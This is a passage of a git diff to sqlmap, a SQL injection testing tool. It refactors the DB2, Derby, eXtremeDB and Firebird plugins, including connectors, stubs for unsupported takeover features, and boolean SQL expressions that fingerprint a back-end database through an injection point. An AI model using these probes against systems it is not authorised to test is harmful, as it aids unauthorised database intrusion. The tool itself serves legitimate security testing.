(blank, banVer) + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -82,7 +83,7 @@ def getFingerprint(self): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(DB2_ALIASES) or conf.dbms in DB2_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(DB2_ALIASES): setDbms(DBMS.DB2) return True @@ -90,23 +91,31 @@ def checkDbms(self): logMsg = "testing %s" % DBMS.DB2 logger.info(logMsg) - randInt = randomInt() - result = inject.checkBooleanExpression("%d=(SELECT %d FROM SYSIBM.SYSDUMMY1)" % (randInt, randInt)) + result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1)") if result: logMsg = "confirming %s" % DBMS.DB2 logger.info(logMsg) - version = self._versionCheck() + result = inject.checkBooleanExpression("JULIAN_DAY(CURRENT DATE) IS NOT NULL") + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.DB2 + logger.warning(warnMsg) + + return False + + version = self._versionCheck() if version: Backend.setVersion(version) setDbms("%s %s" % (DBMS.DB2, Backend.getVersion())) + else: + setDbms(DBMS.DB2) return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.DB2 - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -129,12 +138,14 @@ def checkDbmsOs(self, detailed=False): infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() if result: - versions = { "2003": ("5.2", (2, 1)), + versions = { + "2003": ("5.2", (2, 1)), "2008": ("7.0", (1,)), "2000": ("5.0", (4, 3, 2, 1)), "7": ("6.1", (1, 0)), "XP": ("5.1", (2, 1)), - "NT": ("4.0", (6, 5, 4, 3, 2, 1)) } + "NT": ("4.0", (6, 5, 4, 3, 2, 1)) + } # Get back-end DBMS underlying operating system version for version, data in versions.items(): diff --git a/plugins/dbms/db2/syntax.py b/plugins/dbms/db2/syntax.py index 9a818633656..7ba5c8b9f38 100644 --- a/plugins/dbms/db2/syntax.py +++ b/plugins/dbms/db2/syntax.py @@ -1,19 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + def escaper(value): - return "||".join("CHR(%d)" % ord(_) for _ in value) + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/db2/takeover.py b/plugins/dbms/db2/takeover.py index 1c1b36d3ffe..7c19fd8799c 100644 --- a/plugins/dbms/db2/takeover.py +++ b/plugins/dbms/db2/takeover.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from plugins.generic.takeover import Takeover as GenericTakeover diff --git a/plugins/dbms/derby/__init__.py b/plugins/dbms/derby/__init__.py new file mode 100644 index 00000000000..2b4f3104e87 --- /dev/null +++ b/plugins/dbms/derby/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import DERBY_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.derby.enumeration import Enumeration +from plugins.dbms.derby.filesystem import Filesystem +from plugins.dbms.derby.fingerprint import Fingerprint +from plugins.dbms.derby.syntax import Syntax +from plugins.dbms.derby.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class DerbyMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Apache Derby methods + """ + + def __init__(self): + self.excludeDbsList = DERBY_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.DERBY] = Syntax.escape diff --git a/plugins/dbms/derby/connector.py b/plugins/dbms/derby/connector.py new file mode 100644 index 00000000000..7be45f7412b --- /dev/null +++ b/plugins/dbms/derby/connector.py @@ -0,0 +1,62 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import drda +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/nakagami/pydrda/ + User guide: https://github.com/nakagami/pydrda/blob/master/README.rst + API: https://www.python.org/dev/peps/pep-0249/ + License: MIT + """ + + def connect(self): + self.initConnection() + + try: + self.connector = drda.connect(host=self.hostname, database=self.db, port=self.port) + except drda.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except drda.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (drda.OperationalError, drda.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except drda.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + try: + self.connector.commit() + except drda.OperationalError: + pass + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/derby/enumeration.py b/plugins/dbms/derby/enumeration.py new file mode 100644 index 00000000000..286d20b6c93 --- /dev/null +++ b/plugins/dbms/derby/enumeration.py @@ -0,0 +1,43 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import singleTimeWarnMessage +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on Apache Derby it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def getStatements(self): + warnMsg = "on Apache Derby it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Apache Derby it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on Apache Derby it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on Apache Derby it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getBanner(self): + warnMsg = "on Apache Derby it is not possible to enumerate the banner" + singleTimeWarnMessage(warnMsg) diff --git a/plugins/dbms/derby/filesystem.py b/plugins/dbms/derby/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/derby/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/derby/fingerprint.py b/plugins/dbms/derby/fingerprint.py new file mode 100644 index 00000000000..76d67e89605 --- /dev/null +++ b/plugins/dbms/derby/fingerprint.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import DERBY_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.DERBY) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.DERBY + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(DERBY_ALIASES): + setDbms(DBMS.DERBY) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.DERBY + logger.info(infoMsg) + + result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1 OFFSET 0 ROWS FETCH FIRST 1 ROW ONLY)") + + if result: + infoMsg = "confirming %s" % DBMS.DERBY + logger.info(infoMsg) + + result = inject.checkBooleanExpression("(SELECT CURRENT SCHEMA FROM SYSIBM.SYSDUMMY1) IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.DERBY + logger.warning(warnMsg) + + return False + + setDbms(DBMS.DERBY) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.DERBY + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/derby/syntax.py b/plugins/dbms/derby/syntax.py new file mode 100644 index 00000000000..17a0a02c257 --- /dev/null +++ b/plugins/dbms/derby/syntax.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ + + return expression diff --git a/plugins/dbms/derby/takeover.py b/plugins/dbms/derby/takeover.py new file mode 100644 index 00000000000..c4c4ea098ce --- /dev/null +++ b/plugins/dbms/derby/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Apache Derby it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Apache Derby it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Apache Derby it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Apache Derby it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/extremedb/__init__.py b/plugins/dbms/extremedb/__init__.py new file mode 100644 index 00000000000..74072270325 --- /dev/null +++ b/plugins/dbms/extremedb/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import EXTREMEDB_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.extremedb.enumeration import Enumeration +from plugins.dbms.extremedb.filesystem import Filesystem +from plugins.dbms.extremedb.fingerprint import Fingerprint +from plugins.dbms.extremedb.syntax import Syntax +from plugins.dbms.extremedb.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class ExtremeDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines eXtremeDB methods + """ + + def __init__(self): + self.excludeDbsList = EXTREMEDB_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.EXTREMEDB] = Syntax.escape diff --git a/plugins/dbms/extremedb/connector.py b/plugins/dbms/extremedb/connector.py new file mode 100644 index 00000000000..3c0083ad8cb --- /dev/null +++ b/plugins/dbms/extremedb/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on eXtremeDB it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/extremedb/enumeration.py b/plugins/dbms/extremedb/enumeration.py new file mode 100644 index 00000000000..c820b73e55a --- /dev/null +++ b/plugins/dbms/extremedb/enumeration.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + warnMsg = "on eXtremeDB it is not possible to get the banner" + logger.warning(warnMsg) + + return None + + def getCurrentUser(self): + warnMsg = "on eXtremeDB it is not possible to enumerate the current user" + logger.warning(warnMsg) + + def getCurrentDb(self): + warnMsg = "on eXtremeDB it is not possible to get name of the current database" + logger.warning(warnMsg) + + def isDba(self, user=None): + warnMsg = "on eXtremeDB it is not possible to test if current user is DBA" + logger.warning(warnMsg) + + def getUsers(self): + warnMsg = "on eXtremeDB it is not possible to enumerate the users" + logger.warning(warnMsg) + + return [] + + def getPasswordHashes(self): + warnMsg = "on eXtremeDB it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on eXtremeDB it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getDbs(self): + warnMsg = "on eXtremeDB it is not possible to enumerate databases (use only '--tables')" + logger.warning(warnMsg) + + return [] + + def searchDb(self): + warnMsg = "on eXtremeDB it is not possible to search databases" + logger.warning(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on eXtremeDB it is not possible to search tables" + logger.warning(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on eXtremeDB it is not possible to search columns" + logger.warning(warnMsg) + + return [] + + def search(self): + warnMsg = "on eXtremeDB search option is not available" + logger.warning(warnMsg) + + def getHostname(self): + warnMsg = "on eXtremeDB it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on eXtremeDB it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/extremedb/filesystem.py b/plugins/dbms/extremedb/filesystem.py new file mode 100644 index 00000000000..09a02ac9ec4 --- /dev/null +++ b/plugins/dbms/extremedb/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on eXtremeDB it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on eXtremeDB it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/extremedb/fingerprint.py b/plugins/dbms/extremedb/fingerprint.py new file mode 100644 index 00000000000..99e3737735b --- /dev/null +++ b/plugins/dbms/extremedb/fingerprint.py @@ -0,0 +1,93 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import EXTREMEDB_ALIASES +from lib.core.settings import METADB_SUFFIX +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.EXTREMEDB) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.EXTREMEDB + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(EXTREMEDB_ALIASES): + setDbms(DBMS.EXTREMEDB) + return True + + infoMsg = "testing %s" % DBMS.EXTREMEDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("signature(NULL)=usignature(NULL)") + + if result: + infoMsg = "confirming %s" % DBMS.EXTREMEDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("hashcode(NULL)>=0") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.EXTREMEDB + logger.warning(warnMsg) + + return False + + setDbms(DBMS.EXTREMEDB) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.EXTREMEDB + logger.warning(warnMsg) + + return False + + def forceDbmsEnum(self): + conf.db = ("%s%s" % (DBMS.EXTREMEDB, METADB_SUFFIX)).replace(' ', '_') diff --git a/plugins/dbms/extremedb/syntax.py b/plugins/dbms/extremedb/syntax.py new file mode 100644 index 00000000000..17a0a02c257 --- /dev/null +++ b/plugins/dbms/extremedb/syntax.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ + + return expression diff --git a/plugins/dbms/extremedb/takeover.py b/plugins/dbms/extremedb/takeover.py new file mode 100644 index 00000000000..fa0f6395c4f --- /dev/null +++ b/plugins/dbms/extremedb/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on eXtremeDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on eXtremeDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on eXtremeDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on eXtremeDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/firebird/__init__.py b/plugins/dbms/firebird/__init__.py index 82920d103f5..08b0f1e79bf 100644 --- a/plugins/dbms/firebird/__init__.py +++ b/plugins/dbms/firebird/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class FirebirdMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, T def __init__(self): self.excludeDbsList = FIREBIRD_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.FIREBIRD] = Syntax.escape diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py index 976f91a3083..ac00ce03173 100644 --- a/plugins/dbms/firebird/connector.py +++ b/plugins/dbms/firebird/connector.py @@ -1,17 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import kinterbasdb -except ImportError: +except: pass import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -26,9 +27,6 @@ class Connector(GenericConnector): License: BSD """ - def __init__(self): - GenericConnector.__init__(self) - # sample usage: # ./sqlmap.py -d "firebird://sysdba:testpass@/opt/firebird/testdb.fdb" # ./sqlmap.py -d "firebird://sysdba:testpass@127.0.0.1:3050//opt/firebird/testdb.fdb" @@ -39,27 +37,28 @@ def connect(self): self.checkFileDb() try: - self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), \ - user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") # Reference: http://www.daniweb.com/forums/thread248499.html - except kinterbasdb.OperationalError, msg: - raise SqlmapConnectionException(msg[1]) + # Reference: http://www.daniweb.com/forums/thread248499.html + self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") + except kinterbasdb.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + except kinterbasdb.OperationalError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) return None def execute(self, query): try: self.cursor.execute(query) - except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except kinterbasdb.Error, msg: - raise SqlmapConnectionException(msg[1]) + except kinterbasdb.OperationalError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except kinterbasdb.Error as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff --git a/plugins/dbms/firebird/enumeration.py b/plugins/dbms/firebird/enumeration.py index 16e444b8aee..2e911310b1b 100644 --- a/plugins/dbms/firebird/enumeration.py +++ b/plugins/dbms/firebird/enumeration.py @@ -1,41 +1,38 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import logger from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getDbs(self): warnMsg = "on Firebird it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def getPasswordHashes(self): warnMsg = "on Firebird it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} def searchDb(self): warnMsg = "on Firebird it is not possible to search databases" - logger.warn(warnMsg) - - return [] - - def searchColumn(self): - warnMsg = "on Firebird it is not possible to search columns" - logger.warn(warnMsg) + logger.warning(warnMsg) return [] def getHostname(self): warnMsg = "on Firebird it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Firebird it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/firebird/filesystem.py b/plugins/dbms/firebird/filesystem.py index 0f8d84a8a42..949e3191976 100644 --- a/plugins/dbms/firebird/filesystem.py +++ b/plugins/dbms/firebird/filesystem.py @@ -1,21 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): + def readFile(self, remoteFile): errMsg = "on Firebird it is not possible to read files" raise SqlmapUnsupportedFeatureException(errMsg) - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "on Firebird it is not possible to write files" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index 8d192d3cb3e..db0bbc07a56 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -1,17 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from lib.core.common import Backend from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.common import randomInt from lib.core.common import randomRange +from lib.core.common import randomStr +from lib.core.compat import xrange +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -19,7 +20,6 @@ from lib.core.session import setDbms from lib.core.settings import FIREBIRD_ALIASES from lib.core.settings import METADB_SUFFIX -from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -52,13 +52,14 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" + if banVer: + if re.search(r"-log$", kb.data.banner or ""): + banVer += ", logging enabled" - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -70,17 +71,18 @@ def getFingerprint(self): def _sysTablesCheck(self): retVal = None table = ( - ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)), - ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")), - ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")), - ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")), - # TODO: add test for Firebird 2.5 - ) + ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)), + ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")), + ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")), + ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")), + ("2.5", ("'%s' SIMILAR TO '%s'",)), # Reference: https://firebirdsql.org/refdocs/langrefupd25-similar-to.html + ("3.0", ("FALSE IS FALSE",)), # https://www.firebirdsql.org/file/community/conference-2014/pdf/02_fb.2014.whatsnew.30.en.pdf + ) for i in xrange(len(table)): version, checks = table[i] failed = False - check = checks[randomRange(0, len(checks) - 1)].replace("%d", getUnicode(randomRange(1, 100))) + check = checks[randomRange(0, len(checks) - 1)].replace("%d", getUnicode(randomRange(1, 100))).replace("%s", getUnicode(randomStr())) result = 